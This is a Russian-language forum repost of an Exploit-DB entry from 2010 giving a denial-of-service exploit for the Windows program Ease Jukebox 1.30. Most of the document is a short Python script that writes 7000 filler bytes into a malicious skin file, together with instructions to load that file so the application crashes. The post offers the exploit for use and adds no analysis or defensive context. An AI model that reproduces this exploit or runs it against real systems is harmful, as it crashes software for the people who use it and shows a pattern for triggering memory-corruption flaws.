Exploit Ease Jukebox 1.30 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
15250
Проверка EDB
  1. Пройдено
Автор
SWEET
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-10-14
Код:
#Exploit Title :Ease Jukebox 1.30 Dos vulnerability 
#Software : Ease Jukebox 1.30
#Software link : http://www.mymusictools.com/all-in-one_jukebox_9/ease_jukebox_4040.htm
#Autor : Sweet
#Email : [email protected]
#Software version : 1.30
#Tested on : WinXP sp3 ENG vm
# (thx to Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P  , inj3ct0r.com , exploit-db.com, packetstormsecurity.org, http://ha.ckers.org et 1,2,3 viva L'Algerie :))
#!/usr/bin/python
outfile="skin1.skn"
junk="\x41" * 7000
FILE=open(outfile, "w") 
FILE.write(junk)
FILE.close()
print "[+] File created succesufully , copy the file into the skin folder , open the aplication and select skin1  [+]"
 
Источник
www.exploit-db.com

Похожие темы